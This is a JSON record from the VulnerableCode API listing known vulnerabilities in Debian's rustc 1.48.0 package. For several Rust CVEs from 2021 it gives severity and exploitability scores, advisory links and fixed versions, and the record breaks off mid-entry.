Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/994782?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/994782?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2", "type": "deb", "namespace": "debian", "name": "rustc", "version": "1.48.0+dfsg1-2", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "1.70.0+dfsg1-9", "latest_non_vulnerable_version": "1.86.0+dfsg1-1~bpo13+2", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31468?format=api", "vulnerability_id": "VCID-4khp-kevq-xff5", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28875", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61571", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61733", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61724", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61741", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61645", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61676", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61647", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61695", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61711", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61732", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.6172", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.617", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61742", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.61747", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00416", "scoring_system": "epss", "scoring_elements": "0.6173", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28875" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949194", "reference_id": "1949194", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949194" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1803", "reference_id": "AVG-1803", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1803" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-28875" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4khp-kevq-xff5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31477?format=api", "vulnerability_id": "VCID-69zd-gcvx-fuhr", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-42574", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.96175", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.96167", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.96165", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.24988", "scoring_system": "epss", "scoring_elements": "0.9618", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96236", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96181", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96189", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96197", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.962", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.9621", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96213", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96232", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96233", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.25471", "scoring_system": "epss", "scoring_elements": "0.96234", "published_at": "2026-04-26T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-42574" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/1", "reference_id": "1", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/1" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/02/10", "reference_id": "10", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/02/10" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2005819", "reference_id": "2005819", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2005819" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/4", "reference_id": "4", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/4" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/5", "reference_id": "5", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/5" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2021/11/01/6", "reference_id": "6", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.openwall.com/lists/oss-security/2021/11/01/6" }, { "reference_url": "https://www.kb.cert.org/vuls/id/999008", "reference_id": "999008", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.kb.cert.org/vuls/id/999008" }, { "reference_url": "https://security.archlinux.org/AVG-2506", "reference_id": "AVG-2506", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-2506" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/", "reference_id": "IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/", "reference_id": "LQNTFF24ROHLVPLUOEISBN3F7QM27L4U", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/", "reference_id": "QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4033", "reference_id": "RHSA-2021:4033", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4033" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4034", "reference_id": "RHSA-2021:4034", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4034" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4035", "reference_id": "RHSA-2021:4035", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4035" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4036", "reference_id": "RHSA-2021:4036", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4036" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4037", "reference_id": "RHSA-2021:4037", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4037" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4038", "reference_id": "RHSA-2021:4038", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4038" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4039", "reference_id": "RHSA-2021:4039", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4039" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4585", "reference_id": "RHSA-2021:4585", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4585" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4586", "reference_id": "RHSA-2021:4586", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4586" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4587", "reference_id": "RHSA-2021:4587", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4587" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4588", "reference_id": "RHSA-2021:4588", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4588" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4589", "reference_id": "RHSA-2021:4589", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4589" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4590", "reference_id": "RHSA-2021:4590", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4590" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4591", "reference_id": "RHSA-2021:4591", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4591" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4592", "reference_id": "RHSA-2021:4592", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4592" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4593", "reference_id": "RHSA-2021:4593", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4593" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4594", "reference_id": "RHSA-2021:4594", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4594" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4595", "reference_id": "RHSA-2021:4595", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4595" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4596", "reference_id": "RHSA-2021:4596", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4596" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4598", "reference_id": "RHSA-2021:4598", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4598" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4599", "reference_id": "RHSA-2021:4599", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4599" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4600", "reference_id": "RHSA-2021:4600", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4600" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4601", "reference_id": "RHSA-2021:4601", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4601" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4602", "reference_id": "RHSA-2021:4602", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4602" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4649", "reference_id": "RHSA-2021:4649", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4649" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4669", "reference_id": "RHSA-2021:4669", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4669" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4694", "reference_id": "RHSA-2021:4694", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4694" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4723", "reference_id": "RHSA-2021:4723", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4723" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4724", "reference_id": "RHSA-2021:4724", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4724" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4729", "reference_id": "RHSA-2021:4729", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4729" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4730", "reference_id": "RHSA-2021:4730", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4730" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:4743", "reference_id": "RHSA-2021:4743", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:4743" }, { "reference_url": "https://www.starwindsoftware.com/security/sw-20220804-0002/", "reference_id": "sw-20220804-0002", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.starwindsoftware.com/security/sw-20220804-0002/" }, { "reference_url": "https://www.unicode.org/reports/tr31/", "reference_id": "tr31", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr31/" }, { "reference_url": "https://www.unicode.org/reports/tr36/", "reference_id": "tr36", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr36/" }, { "reference_url": "https://www.unicode.org/reports/tr39/", "reference_id": "tr39", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr39/" }, { "reference_url": "https://www.unicode.org/reports/tr9/tr9-44.html#HL4", "reference_id": "tr9-44.html#HL4", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.unicode.org/reports/tr9/tr9-44.html#HL4" }, { "reference_url": "https://www.scyon.nl/post/trojans-in-your-source-code", "reference_id": "trojans-in-your-source-code", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://www.scyon.nl/post/trojans-in-your-source-code" }, { "reference_url": "https://trojansource.codes", "reference_id": "trojansource.codes", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "https://trojansource.codes" }, { "reference_url": "http://www.unicode.org/versions/Unicode14.0.0/", "reference_id": "Unicode14.0.0", "reference_type": "", "scores": [ { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/" } ], "url": "http://www.unicode.org/versions/Unicode14.0.0/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-42574" ], "risk_score": 3.9, "exploitability": "0.5", "weighted_severity": "7.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-69zd-gcvx-fuhr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31469?format=api", "vulnerability_id": "VCID-7ap9-xghv-dbdy", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28876", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61752", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61918", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61908", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61926", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61826", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61857", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61827", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61876", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61892", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61913", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61901", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61881", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61924", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61929", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00419", "scoring_system": "epss", "scoring_elements": "0.61912", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-28876" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949198", "reference_id": "1949198", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1949198" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803", "reference_id": "986803", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803" }, { "reference_url": "https://security.archlinux.org/AVG-1801", "reference_id": "AVG-1801", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1801" }, { "reference_url": "https://security.gentoo.org/glsa/202210-09", "reference_id": "GLSA-202210-09", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202210-09" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3042", "reference_id": "RHSA-2021:3042", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3042" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:3063", "reference_id": "RHSA-2021:3063", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:3063" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" } ], "aliases": [ "CVE-2021-28876" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7ap9-xghv-dbdy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31474?format=api", "vulnerability_id": "VCID-d8yv-ngej-1kf7", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-31162", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72765", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72913", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72905", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72915", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72773", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72793", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72769", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72808", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72822", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72846", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72829", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72821", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72862", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72873", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00737", "scoring_system": "epss", "scoring_elements": "0.72864", "published_at": "2026-04-21T12:55:00Z" } ], "url": 